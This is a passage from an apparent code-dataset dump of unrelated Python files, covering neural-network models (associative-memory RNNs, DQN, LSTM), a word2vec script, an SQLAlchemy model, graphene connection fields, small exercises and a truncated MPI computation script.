\"\"\"\n Complete the pattern from the partial input.\n\n Nothing more than a simple forward pass without updating the weights.\n\n Parameters\n ----------\n xs_partial : torch.Tensor or tuple of torch.Tensor\n Partially active input vectors from the incoming areas.\n y_partial : torch.Tensor or None, optional\n The stored latent (hidden activations) vector from the previous\n step with partial activations.\n Default: None\n\n Returns\n -------\n y_out : torch.Tensor\n The output vector.\n \"\"\"\n mode = self.training\n self.eval()\n y_out = self(xs_partial, y_latent=y_partial)\n self.train(mode)\n return y_out\n\n def memory_used(self):\n r\"\"\"\n Computes the used memory bits as\n :math:`\\frac{||W||_0}{\\text{size}(W)}`\n\n Returns\n -------\n dict\n A dictionary with used memory for each parameter (weight matrix).\n \"\"\"\n memory_used = {}\n for name, param in self.named_parameters():\n memory_used[name] = param.norm(p=0) / param.nelement()\n return memory_used\n\n def normalize_weights(self):\n \"\"\"\n Normalize the pre-synaptic weights sum to ``1.0``.\n\n Without the normalization, all inputs converge to the same output\n vector determined by the lateral weights because the sum\n ``w_xy @ x + w_lat @ y`` favors the second element. 
Normalization of\n the feedforward and lateral weights makes ``w_xy @ x`` and\n ``w_lat @ y`` of the same magnitude.\n \"\"\"\n for module in find_layers(self, layer_class=AreaRNN):\n for weight in module.parameters(recurse=False):\n # input and recurrent weights\n module._normalize_weight(weight)\n assert torch.isfinite(weight).all()\n\n\nclass AreaRNN(AreaInterface, ABC):\n def __init__(self, *in_features: int, out_features, p_synapse=0.05,\n recurrent_coef=1., sampler=sample_bernoulli):\n super().__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.recurrent_coef = recurrent_coef\n self.weights_input = []\n for parent_id, neurons_in in enumerate(in_features):\n weight_in = nn.Parameter(\n sampler(out_features, neurons_in, proba=p_synapse),\n requires_grad=False)\n self.register_parameter(name=f\"weight_input{parent_id}\",\n param=weight_in)\n self.weights_input.append(weight_in)\n self.weight_recurrent = nn.Parameter(\n sampler(out_features, out_features, proba=p_synapse),\n requires_grad=False)\n self.kwta = KWinnersTakeAll()\n self.normalize_weights()\n\n def forward(self, xs_stim, y_latent=None):\n \"\"\"\n The forward pass :eq:`forward`.\n\n Parameters\n ----------\n xs_stim : torch.Tensor or tuple of torch.Tensor\n Input vectors from the incoming areas.\n y_latent : torch.Tensor or None, optional\n The stored latent (hidden activations) vector from the previous\n step.\n Default: None\n\n Returns\n -------\n y_out : torch.Tensor\n The output vector.\n\n \"\"\"\n if isinstance(xs_stim, torch.Tensor):\n xs_stim = [xs_stim]\n if xs_stim is None or all(x is None for x in xs_stim):\n return None\n assert len(xs_stim) == len(self.weights_input)\n y_out = torch.zeros(self.out_features)\n for x, w_in in zip(xs_stim, self.weights_input):\n if x is not None:\n y_out += w_in.matmul(x)\n if y_latent is not None:\n # y_out += alpha * W_rec @ y_latent\n y_out.addmv_(mat=self.weight_recurrent, vec=y_latent,\n alpha=self.recurrent_coef)\n y_out = self.kwta(y_out)\n if self.training:\n for x, w_in in zip(xs_stim, self.weights_input):\n if x is not None:\n self.update_weight(w_in, x=x, y=y_out)\n if y_latent is not None:\n self.update_weight(self.weight_recurrent, x=y_latent, y=y_out)\n return y_out\n\n def update_weight(self, weight, x, y):\n \"\"\"\n Update the weight, given the activations.\n\n Parameters\n ----------\n weight : torch.Tensor\n The weight to update.\n x, y : torch.Tensor\n Input and output vectors.\n \"\"\"\n pass\n\n @abstractmethod\n def _normalize_weight(self, weight):\n \"\"\"\n Normalize the pre-synaptic weight sum to ``1.0``.\n\n Parameters\n ----------\n weight : torch.Tensor\n A weight matrix.\n \"\"\"\n pass\n\n def complete_pattern(self, y_partial):\n \"\"\"\n Complete the pattern using the recurrent connections only.\n\n Parameters\n ----------\n y_partial : torch.Tensor\n A partially activated latent vector.\n\n Returns\n -------\n y : torch.Tensor\n The reconstructed vector `y`.\n \"\"\"\n y = self.weight_recurrent.matmul(y_partial)\n y = self.kwta(y)\n return y\n\n def extra_repr(self):\n return f\"in_features: {self.in_features}, \" \\\n f\"out_features: {self.out_features}, \" \\\n f\"recurrent_coef={self.recurrent_coef}\"\n\n\nclass AreaRNNHebb(AreaRNN):\n r\"\"\"\n A Hebbian-learning recurrent neural network with one or more incoming input\n layers and only one output layer.\n\n The update rule, if :math:`x_j` and :math:`y_i` neurons fired:\n\n * additive:\n\n .. 
math::\n W_{ij} = W_{ij} + \\beta\n :label: update-additive\n\n * multiplicative:\n\n .. math::\n W_{ij} = W_{ij} * (1 + \\beta)\n :label: update-multiplicative\n\n After each epoch, many repetitions of the same input trial, the weights\n are normalized to have ``1.0`` in its pre-synaptic sum for each neuron.\n\n Parameters\n ----------\n *in_features\n The sizes of input vectors from incoming areas.\n out_features : int\n The size of the output layer.\n p_synapse : float, optional\n The initial probability of recurrent and afferent synaptic\n connectivity.\n Default: 0.05\n recurrent_coef : float, optional\n The recurrent coefficient :math:`\\alpha` in :eq:`forward`.\n Default: 1\n learning_rate : float, optional\n The plasticity coefficient :math:`\\beta` in :eq:`update-additive` and\n :eq:`update-multiplicative`.\n Default: 0.1\n sampler : {sample_bernoulli, sample_uniform_masked}, optional\n Weights initialization function to call: either Bernoulli or uniform.\n Default: sample_bernoulli\n update : {'additive', 'multiplicative'}, optional\n The weight update learning rule.\n Default: 'multiplicative'\n\n Notes\n -----\n `'additive'` update learning rule allows new weights to grow, as opposed\n to `'multiplicative'`.\n\n \"\"\"\n def __init__(self, *in_features: int, out_features, p_synapse=0.05,\n recurrent_coef=1., learning_rate=0.1,\n sampler=sample_bernoulli, update='multiplicative'):\n super().__init__(*in_features, out_features=out_features,\n p_synapse=p_synapse, recurrent_coef=recurrent_coef,\n sampler=sampler)\n self.learning_rate = learning_rate\n if update == 'additive':\n self.update_weight = self.update_weight_additive\n elif update == 'multiplicative':\n self.update_weight = self.update_weight_multiplicative\n else:\n raise ValueError(f\"Invalid update rule: '{update}'\")\n\n def update_weight_additive(self, weight, x, y):\n # w_ij = w_ij + learning_rate, if x_j and y_i fired:\n # w_ij = w_ij + learning_rate * x_j * y_i\n weight.addr_(y, x, alpha=self.learning_rate)\n\n def update_weight_multiplicative(self, weight, x, y):\n # w_ij = w_ij * (1 + learning_rate), if x_j and y_i fired:\n # w_ij = w_ij * (1 + learning_rate * x_j * y_i)\n weight.mul_(1 + self.learning_rate * y.unsqueeze(1) * x.unsqueeze(0))\n\n def _normalize_weight(self, weight):\n presum = weight.sum(dim=1, keepdim=True)\n presum[presum == 0] = 1 # all elements in a row are zeros\n weight /= presum\n\n def extra_repr(self):\n update = self.update_weight.__name__.lstrip('update_weight_')\n return f\"{super().extra_repr()}, update='{update}'\"\n\n\nclass AreaRNNWillshaw(AreaRNN):\n r\"\"\"\n Non-Holographic Associative Memory Area [1]_: a recurrent neural network\n with one or more incoming input layers and only one output layer. The\n weights are sparse and binary.\n\n The update rule, if :math:`x_j` and :math:`y_i` neurons fired:\n\n .. math::\n W_{ij} = 1\n :label: update-will\n\n This update rule is the simplest possible update rule that requires\n neither the learning rate nor the weight normalization, compared to\n :class:`AreaRNNHebb`.\n\n Parameters\n ----------\n *in_features\n The sizes of input vectors from incoming areas.\n out_features : int\n The size of the output layer.\n p_synapse : float, optional\n The initial probability of recurrent and afferent synaptic\n connectivity.\n Default: 0.05\n recurrent_coef : float, optional\n The recurrent coefficient :math:`\\alpha` in :eq:`forward`.\n Default: 1.0\n\n References\n ----------\n .. [1] Willshaw, D. J., Buneman, O. P., & Longuet-Higgins, H. C. 
(1969).\n Non-holographic associative memory. Nature, 222(5197), 960-962.\n\n \"\"\"\n\n def __init__(self, *in_features: int, out_features, p_synapse=0.05,\n recurrent_coef=1, **ignored):\n super().__init__(*in_features,\n out_features=out_features,\n p_synapse=p_synapse,\n recurrent_coef=recurrent_coef,\n sampler=sample_bernoulli)\n\n def update_weight(self, weight, x, y):\n # w_ij = 1, if x_j and y_i fired, and 0 otherwise\n weight.addr_(y, x)\n weight.clamp_max_(1)\n\n def _normalize_weight(self, weight):\n # the weights are already binary at the update stage\n pass\n\n\nclass AreaStack(nn.Sequential, AreaInterface):\n \"\"\"\n Vertically stacked areas. The output activations will be linearly summed.\n\n Parameters\n ----------\n *areas\n Vertically stacked :class:`AreaRNN`.\n \"\"\"\n\n def __init__(self, *areas: AreaRNN):\n areas_named = OrderedDict({\n f\"{letter}\": area for letter, area in zip(ascii_uppercase, areas)\n })\n nn.Sequential.__init__(self, areas_named)\n\n def forward(self, xs_stim, y_latent=None):\n if xs_stim is None:\n xs_stim = [None] * len(self)\n assert len(xs_stim) == len(self)\n if y_latent is None:\n y_latent = [None] * len(xs_stim)\n y_out = [area(x, y_latent=yl) for area, x, yl in\n zip(self, xs_stim, y_latent)]\n return y_out\n\n\nclass AreaSequential(nn.Sequential, AreaInterface):\n \"\"\"\n A sequence of areas. The output of one area is fed into the next area.\n \"\"\"\n\n def forward(self, xs_stim, y_latent=None):\n if xs_stim is None:\n xs_stim = [None] * len(self)\n assert len(xs_stim) == len(self)\n y_out = xs_stim\n if y_latent is None:\n y_latent = [None] * len(self)\n y_intermediate = [] # hidden activations of the intermediate layers\n for module, yl in zip(self, y_latent):\n y_out = module(y_out, y_latent=yl)\n y_intermediate.append(y_out)\n return y_out, y_intermediate\n\n def recall(self, xs_stim):\n y_out, y_intermediate = super().recall(xs_stim)\n return y_out\n","sub_path":"assembly/areas.py","file_name":"areas.py","file_ext":"py","file_size_in_byte":13916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582070992","text":"import gensim, logging\nimport sys\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nf=open(sys.argv[1])\nline_s=[]\nfor line in f:\n\tline=line.strip().split()\n\tline_s.append(line)\nf.close()\nf=open(sys.argv[2])\nline_t=[]\nfor line in f:\n\tline=line.strip().split()\n\tline_t.append(line)\nf.close()\nmodel_s = gensim.models.Word2Vec(line_s,size=100, window=5, min_count=1, workers=4)\nmodel_t = gensim.models.Word2Vec(line_t,size=100, window=5, min_count=1, workers=4)\nmodel_s.save(sys.argv[1]+\".model\")\nmodel_t.save(sys.argv[2]+\".model\")\n\n","sub_path":"nn/exp1/ver5/train_vec_model.py","file_name":"train_vec_model.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"437737263","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : model.py\n# @Author: harry\n# @Date : 2/4/21 6:47 PM\n# @Desc : DQN model\n# Ref: https://medium.com/analytics-vidhya/building-a-powerful-dqn-in-tensorflow-2-0-explanation-tutorial-d48ea8f3177a\n\nimport tensorflow as tf\nfrom tensorflow.keras.initializers import VarianceScaling\nfrom tensorflow.keras.layers import (Add, Conv2D, Dense, Flatten, Input,\n Lambda, Subtract)\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam, RMSprop\nfrom constants 
import RESIZED_HEIGHT, RESIZED_WIDTH, NUM_ACTIONS\n\n\ndef build_q_network(\n n_actions, learning_rate=0.00001,\n input_shape=(RESIZED_HEIGHT, RESIZED_WIDTH),\n history_length=4\n):\n \"\"\"Builds a dueling DQN as a Keras model\n Arguments:\n n_actions: Number of possible action the agent can take\n learning_rate: Learning rate\n input_shape: Shape of the preprocessed frame the model sees\n history_length: Number of historical frames the agent can see\n Returns:\n A compiled Keras model\n \"\"\"\n model_input = Input(shape=(input_shape[0], input_shape[1], history_length))\n x = Lambda(lambda layer: layer / 255)(model_input) # normalize by 255\n\n # x = Conv2D(8, (6, 6), strides=4, kernel_initializer=VarianceScaling(scale=2.),\n # activation='relu', use_bias=False)(x)\n # x = Conv2D(8, (3, 3), strides=2, kernel_initializer=VarianceScaling(scale=2.),\n # activation='relu', use_bias=False)(x)\n x = Conv2D(8, (6, 6), strides=4, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n x = Conv2D(16, (4, 4), strides=2, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n x = Conv2D(16, (3, 3), strides=1, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n x = Conv2D(32, (3, 3), strides=1, kernel_initializer=VarianceScaling(scale=2.),\n activation='relu', use_bias=False)(x)\n\n # Split into value and advantage streams\n val_stream, adv_stream = Lambda(lambda w: tf.split(w, 2, 3))(x) # custom splitting layer\n\n val_stream = Flatten()(val_stream)\n val = Dense(1, kernel_initializer=VarianceScaling(scale=2.))(val_stream)\n\n adv_stream = Flatten()(adv_stream)\n adv = Dense(n_actions, kernel_initializer=VarianceScaling(scale=2.))(adv_stream)\n\n # Combine streams into Q-Values\n reduce_mean = Lambda(lambda w: tf.reduce_mean(w, axis=1, keepdims=True)) # custom layer for reduce mean\n q_vals = Add()([val, Subtract()([adv, reduce_mean(adv)])])\n\n # Build model\n model = Model(model_input, q_vals)\n model.compile(Adam(learning_rate), loss=tf.keras.losses.Huber())\n\n return model\n\n\ndef test_model():\n m = build_q_network(NUM_ACTIONS)\n m.summary()\n\n\nif __name__ == '__main__':\n test_model()\n","sub_path":"dqn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"352163457","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 18 10:04:56 2016\n\n@author: lmcfadden\n\"\"\"\n\n\"\"\"\nIndexError - Trying to access beyond lists limits.\n test = [1, 7,4]\n test[4]\n\nTypeError - Trying to convert an inappropriate type.\n int(test)\n\nNameError - Referencing a non-existent variable.\n a\nTypeError - Mixing data types without coercion.\n 'a'/4\n\n\nSyntaxError: Python can't parse program\nNameError: local or global name not found\nAttributeError: attribute reference fails\nTypeError: operand doesn't have correct type\nValueError: operand type ok, but value is illegal\nIOError: IO system reports malfunction (e.g. 
file not found)\n\"\"\"\n\nans = ''\nwhile ans != 'e':\n    try:\n        a = int(input(\"Tell me a number: \"))\n        b = int(input(\"Tell me another number: \"))\n        #print (\"a/b = \", a/b)\n        #print (\"a+b = \", a+b)\n        #ans = 'e'\n    except ValueError:\n        print (\"Could not convert to a number.\")\n    except ZeroDivisionError:\n        print (\"Can't divide by zero\")\n    except:\n        print (\"Something went very wrong.\")\n\n\n    #print (\"Outside\")","sub_path":"Python_2016/exception_testing.py","file_name":"exception_testing.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"62186331","text":"class Solution(object):\n    def reverse(self, x):\n        \"\"\"\n        :type x: int\n        :rtype: int\n        \"\"\"\n        res = 0\n        abs_x = abs(x)\n        # keep the sign as an int; the original x/abs_x produces a float under Python 3\n        flag = 1 if x >= 0 else -1\n        while abs_x:\n            # pop the last digit of abs_x and push it onto res\n            res = res * 10 + (abs_x % 10)\n            abs_x //= 10\n        res *= flag\n        return 0 if res > pow(2, 31)-1 or res < -pow(2, 31) else res\n\n\n# faster version\n","sub_path":"python3/7_Reverse_Integer.py","file_name":"7_Reverse_Integer.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"547901334","text":"# Problem from Hackerearth\n# https://www.hackerearth.com/fr/practice/data-structures/trees/binary-search-tree/practice-problems/algorithm/monk-and-his-friends/description/\n\n\ndef check_exist(_in, _out):\n    inside_class = set(_in)\n    for stu in _out:\n        if stu in inside_class:\n            print('YES')\n        else:\n            print('NO')\n        inside_class.add(stu)\n\n\ndef solution():\n    T = int(input())\n    for i in range(T):\n        N, M = map(int, input().strip().split())\n        A = list(map(int, input().strip().split()))\n        inside_class = A[:N]\n        outside_class = A[N:]\n        check_exist(inside_class, outside_class)\n\n\nsolution()\n","sub_path":"Blue/Session 14 - Binary Search Tree/Hackerearth_monk-and-his-friends.py","file_name":"Hackerearth_monk-and-his-friends.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"97518150","text":"import datetime\nfrom ulapd_api.extensions import db\n\n\nclass Dataset(db.Model):\n    __tablename__ = 'dataset'\n    dataset_id = db.Column(db.Integer, primary_key=True)\n    name = db.Column(db.String, unique=True, nullable=False)\n    title = db.Column(db.String, nullable=False)\n    version = db.Column(db.String)\n    url = db.Column(db.String)\n    description = db.Column(db.String)\n    licence_name = db.Column(db.String)\n    state = db.Column(db.String, default='active')\n    type = db.Column(db.String, default='dataset')\n    private = db.Column(db.Boolean, default=False)\n    external = db.Column(db.Boolean, default=False)\n    metadata_created = db.Column(db.DateTime(timezone=False), default=datetime.datetime.utcnow)\n\n    def __init__(self, dataset_data):\n        self.name = dataset_data['name']\n        self.title = dataset_data['title']\n        self.version = dataset_data['version']\n        self.url = dataset_data['url']\n        self.description = dataset_data['description']\n        self.licence_name = dataset_data['licence_id']\n        self.state = dataset_data['state']\n        self.type = dataset_data['type']\n        self.private = dataset_data['private']\n        self.external = dataset_data['external']\n\n    @staticmethod\n    def get_all(external=False):\n        return Dataset.query.filter_by(external=external).all()\n\n    @staticmethod\n    def get_dataset_by_id(dataset_id):\n        return Dataset.query.filter_by(dataset_id=dataset_id).first()\n\n    @staticmethod\n    def 
get_dataset_by_name(name):\n return Dataset.query.filter_by(name=name).first()\n\n @staticmethod\n def get_dataset_by_licence_name(licence_name):\n return Dataset.query.filter_by(licence_name=licence_name).first()\n\n def as_dict(self):\n return {\n 'dataset_id': self.dataset_id,\n 'name': self.name,\n 'title': self.title,\n 'version': self.version,\n 'url': self.url,\n 'description': self.description,\n 'licence_id': self.licence_name,\n 'state': self.state,\n 'type': self.type,\n 'private': self.private,\n 'metadata_created': self.metadata_created,\n 'external': self.external\n }\n","sub_path":"ulapd_api/models/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"482930394","text":"def multiply_strings(string1, string2, n):\r\n s = 0\r\n for i in range(n):\r\n s += ord(string1[i]) * ord(string2[i])\r\n return s\r\n\r\n\r\ndef sum_remain(string, n):\r\n s = 0\r\n for i in range(1, n + 1):\r\n s += ord(string[len(string) - i])\r\n return s\r\n\r\n\r\nstrings = input().split(' ')\r\nstr1 = strings[0]\r\nstr2 = strings[1]\r\n\r\nsuma = 0\r\nif len(str1) > len(str2):\r\n shorter = len(str2)\r\n remain = len(str1) - len(str2)\r\n suma = multiply_strings(str1, str2, shorter) + sum_remain(str1, remain)\r\nelif len(str2) > len(str1):\r\n shorter = len(str1)\r\n remain = len(str2) - len(str1)\r\n suma = multiply_strings(str1, str2, shorter) + sum_remain(str2, remain)\r\nelse:\r\n number = len(str1)\r\n suma = multiply_strings(str1, str2, number)\r\n\r\nprint(suma)\r\n\r\n\r\n\r\n\r\n","sub_path":"PyCharm_projects_2020/Fundamentals/text_processing/character_multiplier.py","file_name":"character_multiplier.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"486984316","text":"import time\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom torch.autograd import Variable\nimport bcolz\n\nuse_cuda = 1\n\nclass RNNModel(nn.Module):\n def __init__(self, ntoken=20000, ninp=128, nhid=128, nlayers=7):\n super(RNNModel, self).__init__()\n self.ninp = ninp\n self.nhid = nhid\n self.nlayers = nlayers\n\n self.encoder = nn.Embedding(ntoken, ninp)\n self.rnn = nn.LSTM(input_size=ninp, hidden_size=nhid, num_layers=nlayers, dropout=0.2)\n #self.gru = nn.GRU(input_size=nhid, hidden_size=64, dropout=0.2)\n #self.gru = nn.LSTM(nhid, 64, dropout=0.2)\n self.dense = nn.Linear(nhid, 1)\n self.sm = nn.Sigmoid()\n self.init_weights()\n\n def init_weights(self):\n initrange = 0.1\n self.encoder.weight.data.uniform_(-initrange, initrange)\n self.dense.bias.data.fill_(0)\n self.dense.weight.data.uniform_(-initrange, initrange)\n\n def init_hidden(self, bsz):\n if use_cuda:\n return (Variable(torch.zeros(self.nlayers, bsz, self.nhid).cuda()),\n Variable(torch.zeros(self.nlayers, bsz, self.nhid).cuda()))\n else:\n return (Variable(torch.zeros(self.nlayers, bsz, self.nhid)),\n Variable(torch.zeros(self.nlayers, bsz, self.nhid)))\n\n def forward(self, sentence, hidden):\n embeds = self.encoder(sentence)\n lstm_out, hidden = self.rnn(embeds, hidden)\n # return the last element\n lstm_out = lstm_out[-1]\n decoded = self.dense(lstm_out)\n output = self.sm(decoded).view(-1)\n\n return output, hidden\n\n\ndef get_batch(x, y, i, batch_size, evaluation=False):\n d = torch.from_numpy(x[i:i+batch_size].transpose()).long()\n t = 
torch.from_numpy(y[i:i+batch_size].transpose()).float().view(-1)\n if use_cuda:\n d = d.cuda()\n t = t.cuda()\n data = Variable(d, volatile=evaluation)\n target = Variable(t)\n\n return data, target\n\n\ndef train(model, criterion, x_train, y_train, x_test, y_test, epoch, lr):\n model.train()\n total_loss = 0\n start_time = time.time()\n\n batch_size = 128\n reporting_size = batch_size\n\n optimizer = optim.Adam(model.parameters(), lr=1e-4)\n \n for batch, i in enumerate(range(0, int(len(x_train)/batch_size * batch_size) -batch_size, batch_size)):\n data, targets = get_batch(x_train, y_train, i, batch_size)\n hidden = model.init_hidden(batch_size)\n optimizer.zero_grad()\n\n output, hidden = model(data, hidden)\n loss = criterion(output, targets)\n loss.backward()\n optimizer.step()\n\n total_loss += loss.data\n\n if batch % reporting_size == 0 and batch > 0:\n cur_loss = total_loss[0] / reporting_size\n elapsed = time.time() - start_time\n print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | '\n 'loss {:5.4f} | ppl {:8.2f}'.format(\n epoch, batch, 25000// 32, lr,\n elapsed * 1000 / reporting_size,cur_loss, math.exp(cur_loss)))\n start_time = time.time()\n\n total_loss = 0\n\n\ndef main():\n max_features = 20000\n\n print('Loading data')\n x_train = bcolz.open(rootdir=\"x_train\")\n y_train = bcolz.open(rootdir=\"y_train\")\n x_test = bcolz.open(rootdir=\"x_test\")\n y_test = bcolz.open(rootdir=\"y_test\")\n print(len(x_train), 'train sequences')\n print(len(x_test), 'test sequences')\n\n print('Pad sequences (samples x time)')\n print('x_train shape:', x_train.shape)\n print('x_test shape:', x_test.shape)\n\n\n model = RNNModel()\n if use_cuda:\n model = model.cuda()\n criterion = nn.BCELoss()\n lr = 0.1\n for epoch in range(15):\n train(model, criterion, x_train, y_train, x_test, y_test, epoch, lr)\n\nif __name__ == \"__main__\":\n main()\n\n#r = RNNModel() \n# https://github.com/pytorch/examples/blob/master/word_language_model/model.py\n","sub_path":"lstm/imdb.py","file_name":"imdb.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501863473","text":"from functools import partial\n\nfrom sqlalchemy.orm.query import Query\n\nfrom graphene.relay import ConnectionField\nfrom graphene.relay.connection import PageInfo\nfrom graphql_relay.connection.arrayconnection import connection_from_list_slice\n\nfrom .utils import get_query, sort_argument_for_model\n\n\nclass _UnsortedSQLAlchemyConnectionField(ConnectionField):\n\n @property\n def model(self):\n return self.type._meta.node._meta.model\n\n @classmethod\n def get_query(cls, model, info, sort=None, **args):\n query = get_query(model, info.context)\n if sort is not None:\n if isinstance(sort, str):\n query = query.order_by(sort.order)\n else:\n query = query.order_by(*(value.order for value in sort))\n return query\n\n @property\n def type(self):\n from .types import SQLAlchemyObjectType\n _type = super(ConnectionField, self).type\n assert issubclass(_type, SQLAlchemyObjectType), (\n \"SQLAlchemyConnectionField only accepts SQLAlchemyObjectType types\"\n )\n assert _type._meta.connection, \"The type {} doesn't have a connection\".format(_type.__name__)\n return _type._meta.connection\n\n @classmethod\n def connection_resolver(cls, resolver, connection, model, root, info, **args):\n iterable = resolver(root, info, **args)\n if iterable is None:\n iterable = cls.get_query(model, info, **args)\n if isinstance(iterable, 
Query):\n _len = iterable.count()\n else:\n _len = len(iterable)\n connection = connection_from_list_slice(\n iterable,\n args,\n slice_start=0,\n list_length=_len,\n list_slice_length=_len,\n connection_type=connection,\n pageinfo_type=PageInfo,\n edge_type=connection.Edge,\n )\n connection.iterable = iterable\n connection.length = _len\n return connection\n\n def get_resolver(self, parent_resolver):\n return partial(self.connection_resolver, parent_resolver, self.type, self.model)\n\n\nclass SQLAlchemyConnectionField(_UnsortedSQLAlchemyConnectionField):\n\n def __init__(self, type, *args, **kwargs):\n if 'sort' not in kwargs:\n kwargs.setdefault('sort', sort_argument_for_model(type._meta.model))\n elif kwargs['sort'] is None:\n del kwargs['sort']\n super(SQLAlchemyConnectionField, self).__init__(type, *args, **kwargs)\n\n\n__connectionFactory = _UnsortedSQLAlchemyConnectionField\n\n\ndef createConnectionField(_type):\n return __connectionFactory(_type)\n\n\ndef registerConnectionFieldFactory(factoryMethod):\n global __connectionFactory\n __connectionFactory = factoryMethod\n\n\ndef unregisterConnectionFieldFactory():\n global __connectionFactory\n __connectionFactory = _UnsortedSQLAlchemyConnectionField\n","sub_path":"graphene_sqlalchemy/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"39991259","text":"import random\n\nimport pandas as pd\nimport numpy as np\nfrom libsvm.commonutil import svm_read_problem\nfrom libsvm.svmutil import *\nfrom libsvm.svm import *\n\n\ndef initData():\n with open('data.txt', 'r', encoding='utf-8') as f:\n lines = f.readlines()\n lines1 = lines[:8]\n lines2 = lines[8:]\n random.shuffle(lines1)\n random.shuffle(lines2)\n mid1 = int(len(lines1) / 2)\n mid2 = int(len(lines2) / 2)\n with open('train.txt', 'w') as f:\n f.writelines(lines1[:mid1])\n f.writelines(lines2[:mid2])\n with open('test.txt', 'w') as f:\n f.writelines(lines1[mid1:])\n f.writelines(lines2[mid2:])\n\n\nif __name__ == '__main__':\n initData()\n yt, xt = svm_read_problem('test.txt')\n y, x = svm_read_problem('train.txt')\n linear = svm_train(y, x, '-t 0')\n rbf = svm_train(y, x, '-t 2')\n svm_save_model('linear_model', linear)\n svm_save_model('rbf_model',rbf)\n p1_label, p1_acc, p1_val = svm_predict(yt, xt, linear)\n p1_label, p1_acc, p1_val = svm_predict(yt, xt, rbf)\n","sub_path":"ML/homework2/svm1.py","file_name":"svm1.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"544864208","text":"import json\n\n\nclass Configuration:\n def __init__(self, config_path):\n with open(config_path, 'r') as f:\n config = json.load(f)\n\n # Environment\n self.env_name = config['environment']['env_name']\n self.env_config = config['environment']['config_dir']\n self.map_file = self.env_config + config['environment']['map_file']\n self.setup_file = self.env_config + config['environment']['setup_file']\n self.unit_file = self.env_config + config['environment']['unit_file']\n self.env_output_dir = config['environment']['env_output_dir']\n self.debug = 0\n\n # Exploration\n self.epsilon_start = config['exploration']['epsilon_start']\n self.epsilon_final = config['exploration']['epsilon_final']\n self.epsilon_decay = config['exploration']['epsilon_decay']\n\n # Training\n self.target_update_freq = config['training']['target_update_freq']\n\n self.start_learning = 
config['training']['start_learning']\n        self.lr = config['training']['learning_rate']\n        self.max_steps = config['training']['max_steps']\n        self.max_episodes = config['training']['max_episodes']\n\n        # Memory replay\n        self.capacity = config['memory_replay']['capacity']\n        self.batch_size = config['memory_replay']['batch_size']\n\n        # Output\n        self.save_update_freq = config['output']['save_update_freq']\n        self.output_dir = config['output']['directory']\n        self.dpi = config['output']['dpi']\n\n        # Model\n        self.td_target = config['model']['temporal_difference_target']\n        assert self.td_target in (\"mean\", \"max\", \"individual\")\n        self.gamma = config['model']['gamma']\n        self.hidden_dim = config['model']['hidden_dim']\n        self.exploration_method = config['model']['exploration']\n\n        # Device\n        self.device = config['device']\n","sub_path":"agents/DQN_SelfPlay/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582261608","text":"import numpy as np\nfrom mpi4py import MPI\nimport time\nimport random\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nstatus = MPI.Status()\nsize = 3000\nnumberOfworkers = 20\nnumberOfComp = 3\nnumberOfIter = 1000\nnumberOfGroups = 4\ngroupSize = int(numberOfworkers / numberOfGroups)\ncompVector = [2, 3]\nrequiredCompIndex = groupSize - compVector[0] + 1\npm = 0\nminiComp = 10\nX = np.random.rand(int(size / miniComp), size) * np.sqrt(1)\ncounter = 0\niterIndex = 1\nlastTagCounter = 0\np = 0.4\ntsleep = 0.024\nrecvCounter = 0\nprevRecv = 0\n\n\ndef groupIndex(rank, groupSize, indexId):\n    # integer division: both values are used as indices into recvVector\n    groupTag = (rank - 1) // groupSize\n    groupRank = (((rank - 1) % groupSize)) + 1\n    groupPlacement = ((groupRank + indexId) % groupSize + 1) + ((groupRank + indexId) // (groupSize + 1))\n    a = [groupTag, groupPlacement]\n    return a\n\n\ndef sendCheck(req):\n    if req is None:\n        return True\n    else:\n        return MPI.Request.Test(req)\n\n\nif rank == pm:\n    ts = time.time()\n    message = np.zeros(1)\n    while iterIndex <= numberOfIter + 1:\n        Y = np.empty([size, 1])\n        recvVector = np.zeros([numberOfGroups, groupSize])\n        if iterIndex == numberOfIter + 1:\n            tf = time.time()\n            print(tf - ts)\n            while (lastTagCounter < numberOfworkers):\n                comm.Recv(Y, source=MPI.ANY_SOURCE, 